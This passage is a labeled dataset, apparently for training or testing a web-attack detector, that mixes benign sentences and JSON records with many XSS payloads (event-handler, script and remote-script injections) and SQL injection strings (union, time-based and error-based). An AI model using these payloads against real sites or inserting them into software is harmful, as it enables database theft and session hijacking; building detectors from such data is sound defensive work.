) or 9287 = 4362#,2,SQLi,21239 "{""id"":null,""firstName"":""Selamat"",""lastName"":""Ahmad"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27388 <footer onpointerover=alert(1)>XSS</footer>,1,XSS,7213 "<bgsound onbeforepaste=""alert(1)"" contenteditable>test</bgsound>",1,XSS,2946 "1"" ) ) as uzvu where 2458 = 2458 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10934 Where's the best place to go for a run?,3,normal,23723 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ""dwbh"" like ""dwbh",2,SQLi,14040 "<;IMG STYLE="";xss:expr/*XSS*/ession(alert(';XSS';))"";>;",1,XSS,4435 -5369' ) or 3208 = 6669#,2,SQLi,21245 "iif ( 9342 = 6508,1,1/0 )",2,SQLi,21132 "<form onbeforecopy=""alert(1)"" contenteditable>test</form>",1,XSS,4163 </title><</script/script><script ~~~>\u0061lert(1)</script ~~~>,1,XSS,3119 "-4694%"" ) ) ) union all select 9178,9178,9178,9178,9178--",2,SQLi,17533 "1'|| ( select 'pvmz' from dual where 1090 = 1090 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) ) ||'",2,SQLi,11256 `'><script>\xE2\x80\x82javascript:alert(1)</script>,1,XSS,5324 "1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'iari' = 'iari",2,SQLi,13777 -2431' ) or 8571 = 8571--,2,SQLi,21160 AND 7300=7300 AND 'pKlZ'='pKlY,2,SQLi,20506 "<a href=""\x0Bjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2421 Select a suitable color for your lighting condition or your preference.,3,normal,25660 Where's the manor?,3,normal,23574 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( 6977 = 6977",2,SQLi,13327 "<hgroup ondblclick=""alert(1)"">test</hgroup>",1,XSS,7173 "Select ""Sort left to right"" to alphabetize by row instead.",3,normal,25674 or 'text' = n'text',2,SQLi,21912 "<style>:target {color:red;}</style><figure id=x style=""transition:color 1s"" ontransitionend=alert(1)></figure>",1,XSS,1019 "-4905"" union all select 6082,6082--",2,SQLi,20091 "1%' and elt ( 1210 = 1210,sleep ( 5 ) ) and '%' = '",2,SQLi,18336 "<style>@keyframes slidein {}</style><option style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></option>",1,XSS,352 "1"" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ""grct"" = ""grct",2,SQLi,14919 1 waitfor delay '0:0:5'# opyp,2,SQLi,20743 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></area>",1,XSS,225 du nd his parents have no guts to serve us one these corrupt app.. Citizen of China should Ban Modi Govts misconduct!!. Beware of Shameless and Selective Deshbhakti!!!,3,normal,26507 """The expansion of PW select mirrors the growth and popularity of self-publishing,"" said Adam Boretz, reviews editor for Publishers Weekly and editor of PW select, in an email.",3,normal,26457 &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,2502 "His other works include Select and Choice Observations concerning the First Twelve Caesars (1635); A Treatise of Divinity (1646-1651); Annotations upon the New Testament (1650), of which a Latin translation by Arnold was published at Leipzig in 1732; A Body of Divinity (1654); A Treatise of Religion and Learning (1656); Annotations of the Five Poetical Books of the Old Testament (1657).",3,normal,26100 "<style>:target {transform: rotate(180deg);}</style><caption id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></caption>",1,XSS,566 "Select ""Register New Device"" by pressing ""X"" on the controller.",3,normal,25676 -5803 ) where 8651 = 8651 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10391 ORDER BY 23#,2,SQLi,22317 "<hgroup draggable=""true"" ondragenter=""alert(1)"">test</hgroup>",1,XSS,3387 "<section draggable=""true"" ondrag=""alert(1)"">test</section>",1,XSS,3935 <slot onpointerleave=alert(1)>XSS</slot>,1,XSS,7962 "-8200%"" ) ) union all select 7538,7538,7538#",2,SQLi,19115 "{""id"":null,""firstName"":""Cammie"",""lastName"":""Sim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27452 select ( case when ( 1227 = 4014 ) then 1227 else 1227* ( select 1227 from mysql.db ) end ) #,2,SQLi,14540 "{""id"":null,""firstName"":""Max Ml"",""lastName"":""Tok"",""address"":""669 Packerland Dr #1438"",""city"":""511"",""telephone"":""2367285420""}",3,normal,27148 "<textarea draggable=""true"" ondrag=""alert(1)"">test</textarea>",1,XSS,3537 select case when 5308 = 6745 then 1 else null end--,2,SQLi,18340 Where's the best place to enjoy live music?,3,normal,23934 "{""id"":null,""firstName"":""Joel"",""lastName"":""Azul"",""address"":""10 Anson Road 11-18 International Plaza"",""city"":""292"",""telephone"":""2962394405""}",3,normal,27356 Select the correct option.,3,normal,24279 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--",2,SQLi,17229 They did not conduct any bidding to select the underwriter.,3,normal,25315 "1%' ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13635 1 order by 1#,2,SQLi,22273 "-1988 where 4597 = 4597 union all select 4597,4597,4597,4597,4597,4597--",2,SQLi,16018 Also prepare a list of questions you'd like answered in regards to the plan you'd like to select.,3,normal,26391 1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,10913 "1'+ ( select 'vbqo' where 5630 = 5630 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12042 <textarea oninput=alert(1)>XSS</textarea>,1,XSS,7648 1' ) ) rlike ( select ( case when ( 3876 = 2077 ) then 1 else 0x28 end ) ) and ( ( 'hqcz' like 'hqcz,2,SQLi,14140 "1"" ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ( ""sdps"" = ""sdps",2,SQLi,14732 <embed src=/ onload=alert(1)>,1,XSS,9592 Join the book discussion.,3,normal,22702 "<textarea draggable=""true"" ondragleave=""alert(1)"">test</textarea>",1,XSS,2835 Select flavor.,3,normal,24496 Go to the Start menu to Settings and select System.,3,normal,26142 1%' ) ) ) and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( '%' = ',2,SQLi,10003 "{""id"":null,""name"":""slide""}",3,normal,27099 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and '%' = '",2,SQLi,14573 "<embed onkeypress=""alert(1)"" contenteditable>test</embed>",1,XSS,4097 -9363%' or ( 8459 = 8459 ) *4906 and '%' = ',2,SQLi,19097 select * from users where id = '1' + $+%$ or 1 = 1 -- 1',2,SQLi,17597 "<IMG SRC=x onblur=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3992 <div style=content:url(test2.svg)></div>,1,XSS,8063 1' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( 'xazf' = 'xazf,2,SQLi,10589 Let's explore where the forest begins.,3,normal,23676 "select * from users where id = 1 + @<1# union select 1,version ( ) -- 1",2,SQLi,16040 1 where 2238 = 2238,2,SQLi,22009 "{""id"":null,""name"":""Magnadramon""}",3,normal,27146 Select the right words for your speech.,3,normal,24166 "1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( 'tpeo' like 'tpeo",2,SQLi,14823 "&lt;?import namespace=\""t\"" implementation=\""#default#time2\""&gt;",1,XSS,2787 "1"" ) where 1607 = 1607",2,SQLi,21424 "1"" or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ""xmvr"" = ""xmvr",2,SQLi,10795 -4523 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,10710 "<noembed onpaste=""alert(1)"" contenteditable>test</noembed>",1,XSS,3882 ORDER BY 5--,2,SQLi,22299 Modify records where needed.,3,normal,23443 Select a cozy corner.,3,normal,22706 1%' ) ) and 3721 = 2597#,2,SQLi,21250 "-3279"" union all select 8568,8568,8568,8568--",2,SQLi,18998 "1 ) where 6340 = 6340 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11999 "<aside ondblclick=""alert(1)"">test</aside>",1,XSS,7749 "-8709"" or 8571 = 8571--",2,SQLi,21358 "<video onbeforecut=""alert(1)"" contenteditable>test</video>",1,XSS,3947 "<svg xmlns=""http://www.w3.org/2000/svg"">LOL<script>alert(123)</script></svg>",1,XSS,2166 <var onfocusout=alert(1) tabindex=1 id=x></var><input autofocus>,1,XSS,2888 -7962' ) ) as pgqz where 6058 = 6058 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10133 "<option onkeyup=""alert(1)"" contenteditable>test</option>",1,XSS,4356 <script id=x tabindex=1 onfocus=alert(1)></script>,1,XSS,5668 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></marquee>",1,XSS,174 "<style>:target {transform: rotate(180deg);}</style><time id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></time>",1,XSS,641 "A third, related factor was England's decision to select Jofra Archer.",3,normal,26433 "<?xml-stylesheet type=""text/xml"" href=""#stylesheet""?>",1,XSS,5067 "<style>@keyframes x{}</style><blink style=""animation-name:x"" onanimationstart=""alert(1)""></blink>",1,XSS,1550 "<frame onmousemove=""alert(1)"">test</frame>",1,XSS,7438 "1' ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'pqxe' like 'pqxe",2,SQLi,10956 -8860 ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,10048 "><script+src=https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)""></script>",1,XSS,1038 Insert the USB drive into the computer.,3,normal,22936 "1%' ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( '%' = '",2,SQLi,14443 1' and ( 3020 = 3020 ) *6703 and 'hnvf' = 'hnvf,2,SQLi,18851 "<kbd onmousemove=""alert(1)"">test</kbd>",1,XSS,8421 "1"" ) as xaye where 5343 = 5343 and 4355 = 7475#",2,SQLi,18894 <script>alert(/XSS/)</script>,1,XSS,9585 "{""id"":null,""name"":""Genesect""}",3,normal,27457 "1 ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( 8294 = 8294",2,SQLi,10737 1' ) and 1987 = 3756#,2,SQLi,21630 1 ) ) ) and 9198 = 9198--,2,SQLi,21105 <small onpointerup=alert(1)>XSS</small>,1,XSS,8260 "1 ) ) as rpwt where 4103 = 4103 and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12491 Plant some vibrant flowers in your garden.,3,normal,22965 Plant some colorful flowers.,3,normal,22629 1' ) where 2753 = 2753 and ( 2739 = 8047 ) *8047--,2,SQLi,18432 "-1438 where 6759 = 6759 union all select 6759,6759#",2,SQLi,18280 "<style>@keyframes slidein {}</style><footer style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></footer>",1,XSS,356 -4562' ) or 3038 = 3038,2,SQLi,21318 "<basefont onmousemove=""alert(1)"">test</basefont>",1,XSS,5906 "1'|| ( select 'zrea' from dual where 1223 = 1223 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,12978 "<style>:target {color: red;}</style><dd id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></dd>",1,XSS,1166 Select deliver.,3,normal,24704 "<legend draggable=""true"" ondragenter=""alert(1)"">test</legend>",1,XSS,3397 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3--",2,SQLi,14820 "{""id"":null,""firstName"":""Tao"",""lastName"":""Ming"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26875 "1"" ) as ipxg where 4031 = 4031 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,12784 "<meta charset=""mac-farsi"">¼script¾javascript:alert(1)¼/script¾",1,XSS,3129 "<body onresize=""print()"">",1,XSS,9697 "-5581%' ) ) ) union all select 4266,4266,4266,4266,4266,4266,4266,4266,4266,4266#",2,SQLi,15162 <base onpointerout=alert(1)>XSS</base>,1,XSS,8504 -4947' order by 1#,2,SQLi,22056 Delete the files.,3,normal,22837 or (EXISTS),2,SQLi,22349 %' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337,2,SQLi,16559 "<SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>",1,XSS,3589 "<basefont draggable=""true"" ondrag=""alert(1)"">test</basefont>",1,XSS,3559 Select a comfortable pillow for the night.,3,normal,22979 "1 ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users )",2,SQLi,10986 1 ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 3945 = 3945,2,SQLi,13028 "-6198"" ) or make_set ( 3602 = 2178,2178 ) and ( ""xksq"" like ""xksq",2,SQLi,16732 """,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,16029 "<video oncut=""alert(1)"" contenteditable>test</video>",1,XSS,5173 `'><script>\x0Bjavascript:alert(535)</script>,1,XSS,6746 "<listing onclick=""alert(1)"">test</listing>",1,XSS,7401 "1%"" or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""%"" = """,2,SQLi,11291 Select your combat.,3,normal,24921 <iframe/onload=alert(/INJECTX/)>,1,XSS,9487 "1%' ) ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13854 1'|| ( select 'zoqo' from dual where 2063 = 2063,2,SQLi,18787 "1"" ) as rovd where 3764 = 3764 and elt ( 4249 = 4249,7259 ) --",2,SQLi,16916 "1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'qgdv' = 'qgdv",2,SQLi,13914 Join the fitness club.,3,normal,22633 a' waitfor delay '0:0:10'--,2,SQLi,20852 "<main onmouseout=""alert(1)"">test</main>",1,XSS,8180 "1 ) as ooex where 1087 = 1087 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11644 <video onpointerout=alert(1)>XSS</video>,1,XSS,7860 "1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17509 Update the file.,3,normal,22872 &lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,2605 "<dfn onmouseout=""alert(1)"">test</dfn>",1,XSS,8612 "<svg xmlns=""http://www.w3.org/2000/svg"">",1,XSS,8064 "<script> Object.prototype.src = ['data:,alert(1)//']</script>",1,XSS,3252 "1"" ) ) or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ""ampn"" like ""ampn",2,SQLi,12625 1%' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( '%' = ',2,SQLi,15881 "<style>:target {transform: rotate(180deg);}</style><em id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></em>",1,XSS,711 "<svg><animate xlink:href=""#x"" attributeName=""href"" values=""data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x"" /><use id=x />",1,XSS,120 "1' ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( 'weof' = 'weof",2,SQLi,10238 "<time onkeypress=""alert(1)"" contenteditable>test</time>",1,XSS,4600 <acronym id=x tabindex=1 ondeactivate=alert(1)></acronym><input id=y autofocus>,1,XSS,2044 "<dialog onmouseup=""alert(1)"">test</dialog>",1,XSS,7422 <datalist onpointerdown=alert(1)>XSS</datalist>,1,XSS,6132 "select * from users where id = 1 or ""%,"" or 1 = 1 -- 1",2,SQLi,17910 "<style>@keyframes slidein {}</style><basefont style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></basefont>",1,XSS,319 -5217 where 3620 = 3620 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,10590 `'><script>\xE2\x81\x9Fjavascript:alert(1)</script>,1,XSS,5317 Join tables where possible.,3,normal,23257 select ( case when ( 8331 = 5625 ) then 8331 else 8331* ( select 8331 from mysql.db ) end ) #,2,SQLi,14481 "1%' ) ) ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13443 "1 ) as otsb where 8380 = 8380 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,12897 "; if not ( substring ( ( select @@version ) ,25,1 ) <> 5 ) waitfor delay '0:0:2' --",2,SQLi,15017 <isindex type=image src=1 onerror=alert(XSS)>,1,XSS,6526 "<menuitem onmouseleave=""alert(1)"">test</menuitem>",1,XSS,5741 "When you start the purchase, select the ""G Pay"" icon to select your Google payment method.",3,normal,25151 "1' ) as khaa where 8157 = 8157 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,14977 "<hr draggable=""true"" ondragend=""alert(1)"">test</hr>",1,XSS,5472 "1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'imqi' = 'imqi",2,SQLi,14360 "1%' union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16495 "<summary oncopy=""alert(1)"" contenteditable>test</summary>",1,XSS,4165 "1 ) where 1880 = 1880 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13204 "<style>@keyframes slidein {}</style><abbr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></abbr>",1,XSS,405 "<video oncopy=""alert(1)"" contenteditable>test</video>",1,XSS,4913 "1"" ) ) as krro where 1050 = 1050 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11446 <th onpointerup=alert(1)>XSS</th>,1,XSS,9368 Select pillow.,3,normal,23044 <animate onpointerenter=alert(1)>XSS</animate>,1,XSS,6380 "and 1=( if((load_file(char(110,46,101,120,11 ...",2,SQLi,18649 "and 1 = ( if ( ( load_file ( char ( 110,46,101,120,116 ) ) <>char ( 39,39 ) ) ,1,0 ) ) ;",2,SQLi,14768 "<fieldset onpaste=""alert(1)"" contenteditable>test</fieldset>",1,XSS,3541 "<content onmouseover=""alert(1)"">test</content>",1,XSS,6312 <i onpointerenter=alert(1)>XSS</i>,1,XSS,9222 "<;A HREF="";http://ha.ckers.org@google"";>;XSS<;/A>;",1,XSS,5519 "1"" and ( 3020 = 3020 ) *6703 and ""itpt"" = ""itpt",2,SQLi,18844 <rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus>,1,XSS,2596 In 1857 he was select preacher at his university.,3,normal,26022 1%' ) ) ) waitfor delay '0:0:5'--,2,SQLi,20206 ) or '1'='1,2,SQLi,22340 "-3169"" order by 1#",2,SQLi,22043 "<p oncopy=""alert(1)"" contenteditable>test</p>",1,XSS,6657 "select * from generate_series ( 1488,1488,case when ( 1488 = 1685 ) then 1 else 0 end ) limit 1--",2,SQLi,14290 "-3604' ) as fyev where 7259 = 7259 union all select 7259,7259,7259,7259--",2,SQLi,15891 1 ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( 1233 = 1233,2,SQLi,17833 "{""id"":null,""firstName"":""Suraya"",""lastName"":""Rasid"",""address"":""158 N SCOTT STREET, JOLIET IL 60432"",""city"":""430"",""telephone"":""5330833130""}",3,normal,27436 "1"" ) where 5358 = 5358",2,SQLi,21496 "<;SCRIPT>;document.write("";<;SCRI"";);<;/SCRIPT>;PT SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,1504 "The MSB Select DAC II costs just shy of $90,000 (before taxes and extra options) and its allied Select headphone amp is $0003,950.",3,normal,25411 "<style>:target {transform: rotate(180deg);}</style><big id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></big>",1,XSS,680 He selected a painting to hang on the wall.,3,normal,23703 <// style=x:expression\28javascript:alert(1)\29>,1,XSS,5853 "<header ondblclick=""alert(1)"">test</header>",1,XSS,7197 "1 ) ) as hrks where 7637 = 7637 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,16325 "-7568"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""jxge"" like ""jxge",2,SQLi,10119 "<datalist onbeforecut=""alert(1)"" contenteditable>test</datalist>",1,XSS,2941 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""%"" = """,2,SQLi,12414 "<style>BODY{-moz-binding:url(""http://www.securitycompass.com/xssmoz.xml#xss"")}</style>",1,XSS,1852 "<style>:target {color: red;}</style><rtc id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></rtc>",1,XSS,1072 1' ) as qcse where 4147 = 4147 waitfor delay '0:0:5'--,2,SQLi,17953 "><img src=x onerror=javascript:alert((""A""))>",1,XSS,6787 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,14468 "-3628"" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,10696 Select your outshine.,3,normal,25015 <marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee>,1,XSS,3394 "-6407' ) or elt ( 1631 = 4946,4946 ) and ( 'jpnz' = 'jpnz",2,SQLi,17507 Select the ideal gift for a special occasion.,3,normal,24177 "email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z",2,SQLi,16826 "1"" rlike sleep ( 5 )",2,SQLi,21790 1' ) ) ) or sleep ( 5 ) #,2,SQLi,21091 "-3194"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""erua"" = ""erua",2,SQLi,10163 1' where 2134 = 2134 rlike ( select ( case when ( 3613 = 2090 ) then 1 else 0x28 end ) ) --,2,SQLi,14630 "<rp oncontextmenu=""alert(1)"">test</rp>",1,XSS,8403 1' ) ) as cjjm where 1981 = 1981,2,SQLi,20285 "<col onkeypress=""alert(1)"" contenteditable>test</col>",1,XSS,4895 <abbr onpointerup=alert(1)>XSS</abbr>,1,XSS,8723 Update the look.,3,normal,22818 select * from users where id = '1' or $ 1 = 1 or 1 = 1 -- 1',2,SQLi,17130 -3834' ) ) as hhiy where 2086 = 2086 or 3038 = 3038,2,SQLi,18268 "To partially ameliorate this problem, right click on the image and select ""Viewer Options.""",3,normal,25267 "{""id"":null,""name"":""Magpie""}",3,normal,27028 <font onpointerout=alert(1)>XSS</font>,1,XSS,8501 union select * from users where login = char ...,2,SQLi,18651 "-3230"" ) ) as kbxc where 5007 = 5007 or 2107 = 8818",2,SQLi,18400 "-5439"" or 2559 = 4692 and ""dcrf"" like ""dcrf",2,SQLi,19183 They'll review all applications and select approximately 15 startups to compete.,3,normal,25309 "1"" union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16611 -9264' ) or 8571 = 8571--,2,SQLi,21067 <svg id=x tabindex=1 onactivate=alert(1)></svg>,1,XSS,6119 "1' in boolean mode ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12740 <applet onreadystatechange=alert(1)></applet>,1,XSS,6570 "<progress oncontextmenu=""alert(1)"">test</progress>",1,XSS,5672 Select the perfect moment.,3,normal,24350 "<nav onmouseup=""alert(1)"">test</nav>",1,XSS,8952 "1%"" ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13354 "<div id=""118""><div draggable=""true"" ondragstart=""event.dataTransfer.setData('text/plain','malicious code');""><h1>Drop 